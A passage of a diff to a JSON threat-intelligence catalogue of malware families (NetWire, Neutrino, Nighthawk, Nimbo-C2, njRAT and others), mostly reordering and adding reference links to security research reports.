"https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf"
],
"synonyms": [
@@ -33654,15 +35485,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "59b70721-6fed-4805-afa5-4ff2554bef81",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "3a26ee44-3224-48f3-aefb-3978c972d928",
"value": "NetTraveler"
},
@@ -33671,51 +35493,57 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire",
- "https://decoded.avast.io/adolfstreda/the-tangle-of-wiryjmpers-obfuscation/",
- "https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers",
- "https://blog.talosintelligence.com/2021/09/operation-armor-piercer.html",
- "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
- "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
- "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader",
- "https://www.amnesty.org/en/latest/research/2020/06/india-human-rights-defenders-targeted-by-a-coordinated-spyware-operation/",
- "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf",
- "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
- "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire",
- "https://maskop9.wordpress.com/2019/01/30/analysis-of-netwiredrc-trojan/",
- "https://news.sophos.com/en-us/2020/05/14/raticate/",
- "https://blog.vincss.net/2020/03/re011-unpack-crypter-cua-malware-netwire-bang-x64dbg.html",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://www.circl.lu/pub/tr-23/",
- "https://www.sentinelone.com/wp-content/uploads/2022/02/Modified-Elephant-APT-and-a-Decade-of-Fabricating-Evidence-SentinelLabs.pdf",
- "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
- "https://context-cdn.washingtonpost.com/notes/prod/default/documents/b19a6f2e-55a1-4915-9c2d-5fae0110418c/note/b463d38b-2384-4bb0-a94b-b1b17223ffd0.",
- "https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://mp.weixin.qq.com/s/yrDzybPVTbu_9SrZPlSNKA",
- "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html",
- "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/",
- "https://mp.weixin.qq.com/s/xUM2x89GuB8uP6otN612Fg",
- "https://drive.google.com/file/d/1dD2sWYES_hrPsoql4G0aVF9ILIxAS4Fd/view",
- "https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign",
- "https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html",
- "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
- "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://community.riskiq.com/article/24759ad2",
- "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://www.youtube.com/watch?v=TeQdZxP0RYY",
- "https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers",
"https://news.drweb.ru/show/?i=13281&c=23",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "https://yoroi.company/research/new-cyber-operation-targets-italy-digging-into-the-netwire-attack-chain/",
- "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf",
"https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://mp.weixin.qq.com/s/yrDzybPVTbu_9SrZPlSNKA",
+ "https://www.youtube.com/watch?v=TeQdZxP0RYY",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage",
"https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
- "https://threatpost.com/ta2541-apt-rats-aviation/178422/"
+ "https://community.riskiq.com/article/24759ad2",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
+ "https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://blog.vincss.net/2020/03/re011-unpack-crypter-cua-malware-netwire-bang-x64dbg.html",
+ "https://yoroi.company/research/new-cyber-operation-targets-italy-digging-into-the-netwire-attack-chain/",
+ "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/",
+ "https://lmntrix.com/lab/analysis-of-netwire-rat/",
+ "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
+ "https://www.circl.lu/pub/tr-23/",
+ "https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://www.theregister.com/2023/03/10/fbi_netwire_seizure/",
+ "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html",
+ "https://threatpost.com/ta2541-apt-rats-aviation/178422/",
+ "https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers",
+ "https://drive.google.com/file/d/1dD2sWYES_hrPsoql4G0aVF9ILIxAS4Fd/view",
+ "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
+ "https://www.sentinelone.com/wp-content/uploads/2022/02/Modified-Elephant-APT-and-a-Decade-of-Fabricating-Evidence-SentinelLabs.pdf",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
+ "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/",
+ "https://context-cdn.washingtonpost.com/notes/prod/default/documents/b19a6f2e-55a1-4915-9c2d-5fae0110418c/note/b463d38b-2384-4bb0-a94b-b1b17223ffd0.",
+ "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
+ "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire",
+ "https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers",
+ "https://maskop9.wordpress.com/2019/01/30/analysis-of-netwiredrc-trojan/",
+ "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
+ "https://decoded.avast.io/adolfstreda/the-tangle-of-wiryjmpers-obfuscation/",
+ "https://news.sophos.com/en-us/2020/05/14/raticate/",
+ "https://drive.google.com/file/d/13prt2ve_sHNRRiGthB07qtfuinftJX35/view",
+ "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader",
+ "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728",
+ "https://blog.talosintelligence.com/2021/09/operation-armor-piercer.html",
+ "https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html",
+ "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html",
+ "https://mp.weixin.qq.com/s/xUM2x89GuB8uP6otN612Fg",
+ "https://www.amnesty.org/en/latest/research/2020/06/india-human-rights-defenders-targeted-by-a-coordinated-spyware-operation/",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
],
"synonyms": [
"NetWeird",
@@ -33732,22 +35560,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.neuron",
- "https://www.ncsc.gov.uk/alerts/turla-group-malware",
"https://www.secureworks.com/research/threat-profiles/iron-hunter",
+ "https://www.ncsc.gov.uk/alerts/turla-group-malware",
"https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "5c2eeaec-25e3-11e8-9d28-7f64aba5b173",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "101c2c0e-c082-4b5a-b820-2da789e839d9",
"value": "Neuron"
},
@@ -33756,19 +35575,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino",
- "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/",
- "https://web.archive.org/web/20191223034907/http://blog.ptsecurity.com/2019/08/finding-neutrino.html",
- "http://www.peppermalware.com/2019/01/analysis-of-neutrino-bot-sample-2018-08-27.html",
- "https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/",
- "http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/",
- "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/",
- "https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/",
- "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet",
"https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/",
- "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/22",
+ "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet",
+ "https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/",
+ "http://www.peppermalware.com/2019/01/analysis-of-neutrino-bot-sample-2018-08-27.html",
"http://blog.ptsecurity.com/2019/08/finding-neutrino.html",
- "https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex"
+ "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/22",
+ "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/",
+ "https://web.archive.org/web/20191223034907/http://blog.ptsecurity.com/2019/08/finding-neutrino.html",
+ "https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/",
+ "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/",
+ "http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html",
+ "https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/"
],
"synonyms": [
"Kasidet"
@@ -33809,12 +35628,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat",
+ "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
+ "https://securelist.com/cycldek-bridging-the-air-gap/97157/",
"https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/",
"https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations",
- "https://securelist.com/cycldek-bridging-the-air-gap/97157/",
- "https://meltx0r.github.io/tech/2020/02/12/goblin-panda-apt.html",
- "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
"https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view",
+ "https://meltx0r.github.io/tech/2020/02/12/goblin-panda-apt.html",
"https://medium.com/@Sebdraven/goblin-panda-continues-to-target-vietnam-bc2f0f56dcd6"
],
"synonyms": [],
@@ -33841,8 +35660,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings",
- "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html",
"https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/",
+ "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html",
"https://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/"
],
"synonyms": [],
@@ -33861,15 +35680,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "5abc6792-be17-48ee-a765-29cffa4242ee",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "1d32e7c3-840e-4247-b28b-818cb1c4ae7c",
"value": "NewsReels"
},
@@ -33878,25 +35688,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct",
- "https://www.secureworks.com/research/threat-profiles/bronze-express",
- "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf",
+ "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/",
"http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf",
- "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/"
+ "https://www.secureworks.com/research/threat-profiles/bronze-express",
+ "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf"
],
"synonyms": [
"CT"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "c5e3766c-9527-47c3-94db-f10de2c56248",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "ec50a75e-81f0-48b3-b1df-215eac646421",
"value": "NewCT"
},
@@ -33932,8 +35733,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ngioweb",
- "https://research.checkpoint.com/ramnits-network-proxy-servers/",
- "https://www.fireeye.com/blog/threat-research/2018/05/deep-dive-into-rig-exploit-kit-delivering-grobios-trojan.html"
+ "https://www.fireeye.com/blog/threat-research/2018/05/deep-dive-into-rig-exploit-kit-delivering-grobios-trojan.html",
+ "https://research.checkpoint.com/ramnits-network-proxy-servers/"
],
"synonyms": [
"Grobios"
@@ -33970,19 +35771,36 @@
"uuid": "5a998606-a9a9-42ad-affb-9be37e11ec25",
"value": "Nibiru"
},
+ {
+ "description": "C2 framework.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nighthawk",
+ "https://github.com/struppigel/hedgehog-tools/blob/main/nighthawk_str_decoder.py",
+ "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f",
+ "https://github.com/kevoreilly/CAPEv2/blob/master/modules/processing/parsers/CAPE/Nighthawk.py",
+ "https://www.proofpoint.com/us/blog/threat-insight/nighthawk-and-coming-pentest-tool-likely-gain-threat-actor-notice",
+ "https://web.archive.org/web/20220505170100/https://suspicious.actor/2022/05/05/mdsec-nighthawk-study.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c8b9aa40-9c55-4283-851c-635673f87182",
+ "value": "Nighthawk"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nightsky",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.bleepingcomputer.com/news/security/night-sky-is-the-latest-ransomware-targeting-corporate-networks/",
- "https://twitter.com/cglyer/status/1480742363991580674",
"https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
+ "https://twitter.com/cglyer/status/1480742363991580674",
+ "https://twitter.com/cglyer/status/1480734487000453121",
"https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation",
+ "https://www.bleepingcomputer.com/news/security/night-sky-is-the-latest-ransomware-targeting-corporate-networks/",
"https://www.youtube.com/watch?v=Yzt_zOO8pDM",
"https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/",
- "https://twitter.com/cglyer/status/1480734487000453121"
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself"
],
"synonyms": [
"Night Sky"
@@ -34006,6 +35824,19 @@
"uuid": "b52a6512-7b0c-431a-8680-93f12921ba46",
"value": "NimbleMamba "
},
+ {
+ "description": "According to the author, Nimbo-C2 is yet another (simple and lightweight) C2 framework. The agent currently supports Windows x64 only. It's written in Nim, with some usage of .NET (by dynamically loading the CLR to the process).",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimbo_c2",
+ "https://github.com/itaymigdal/Nimbo-C2"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "bda7efa0-e08d-453e-95d4-9307c5104a69",
+ "value": "Nimbo-C2"
+ },
{
"description": "Malware written in Nim, stealing data including discord tokens from browsers, exfiltrating the results via a Discord webhook.",
"meta": {
@@ -34052,6 +35883,7 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol",
"https://en.wikipedia.org/wiki/Nitol_botnet",
"https://krebsonsecurity.com/tag/nitol/",
+ "https://asec.ahnlab.com/en/44504/",
"https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/"
],
"synonyms": [],
@@ -34065,10 +35897,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nitro",
- "https://twitter.com/malwrhunterteam/status/1430616882231578624",
- "https://www.bleepingcomputer.com/news/security/discord-nitro-gift-codes-now-demanded-as-ransomware-payments/",
"https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf",
- "https://github.com/nightfallgt/nitro-ransomware"
+ "https://github.com/nightfallgt/nitro-ransomware",
+ "https://www.bleepingcomputer.com/news/security/discord-nitro-gift-codes-now-demanded-as-ransomware-payments/",
+ "https://twitter.com/malwrhunterteam/status/1430616882231578624"
],
"synonyms": [
"Hydra"
@@ -34109,84 +35941,81 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://unit42.paloaltonetworks.com/njrat-pastebin-command-and-control",
- "https://www.4hou.com/posts/VoPM",
- "https://asec.ahnlab.com/1369",
- "https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt",
- "https://ti.360.net/blog/articles/analysis-of-apt-c-27/",
- "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
- "https://www.seqrite.com/documents/en/white-papers/Whitepaper-OperationSideCopy.pdf",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
- "https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/",
- "https://malwr-analysis.com/2020/06/21/njrat-malware-analysis/",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf",
- "https://blog.talosintelligence.com/2021/07/sidecopy.html",
- "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
- "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
- "https://www.secureworks.com/research/threat-profiles/copper-fieldstone",
- "https://blog.sonatype.com/bladabindi-njrat-rat-in-jdb.js-npm-malware",
- "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
- "https://news.sophos.com/en-us/2020/05/14/raticate/",
- "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
- "https://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/",
- "https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA",
- "https://github.com/itsKindred/malware-analysis-writeups/blob/master/bashar-bachir-chain/bashar-bachir-analysis.pdf",
+ "https://attack.mitre.org/groups/G0096",
+ "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
"https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://forensicitguy.github.io/njrat-installed-from-msi/",
- "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388",
- "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains",
- "https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/",
- "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
- "https://labs.k7computing.com/?p=21904",
- "https://blog.reversinglabs.com/blog/rats-in-the-library",
- "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.njRAT",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf",
"https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g",
"https://twitter.com/ESETresearch/status/1449132020613922828",
- "https://cyberandramen.net/2022/01/12/analysis-of-njrat-powerpoint-macros/",
- "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
- "https://intel471.com/blog/privateloader-malware",
- "https://cybergeeks.tech/just-another-analysis-of-the-njrat-malware-a-step-by-step-approach/",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/",
+ "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
"https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf",
- "https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html",
"https://blogs.360.cn/post/APT-C-44.html",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
- "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel",
- "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479",
- "https://blog.morphisec.com/syk-crypter-discord",
+ "https://blog.sonatype.com/bladabindi-njrat-rat-in-jdb.js-npm-malware",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf",
"https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://attack.mitre.org/groups/G0096",
- "https://securelist.com/apt-trends-report-q2-2019/91897/",
- "https://www.trendmicro.com/en_us/research/20/i/wind-up-windscribe-vpn-bundled-with-backdoor.html",
- "https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/",
- "http://blogs.360.cn/post/analysis-of-apt-c-37.html",
- "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html",
+ "https://blog.reversinglabs.com/blog/rats-in-the-library",
+ "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services",
+ "https://forensicitguy.github.io/njrat-installed-from-msi/",
+ "https://ti.360.net/blog/articles/analysis-of-apt-c-27/",
+ "https://labs.k7computing.com/?p=21904",
+ "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
+ "https://unit42.paloaltonetworks.com/njrat-pastebin-command-and-control",
+ "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel",
+ "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt",
+ "https://malwr-analysis.com/2020/06/21/njrat-malware-analysis/",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://www.secureworks.com/research/threat-profiles/copper-fieldstone",
+ "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.njRAT",
+ "https://www.seqrite.com/documents/en/white-papers/Whitepaper-OperationSideCopy.pdf",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt",
+ "https://blog.morphisec.com/syk-crypter-discord",
+ "https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/",
+ "https://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
+ "https://www.4hou.com/posts/VoPM",
+ "https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/",
+ "https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks",
"https://www.menlosecurity.com/blog/isomorph-infection-in-depth-analysis-of-a-new-html-smuggling-campaign/",
- "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf"
+ "https://github.com/itsKindred/malware-analysis-writeups/blob/master/bashar-bachir-chain/bashar-bachir-analysis.pdf",
+ "https://di.sclosu.re/en/njrat-malware-spreading-through-discord-cdn-and-facebook-ads/",
+ "http://blogs.360.cn/post/analysis-of-apt-c-37.html",
+ "https://cybergeeks.tech/just-another-analysis-of-the-njrat-malware-a-step-by-step-approach/",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
+ "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/",
+ "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
+ "https://asec.ahnlab.com/1369",
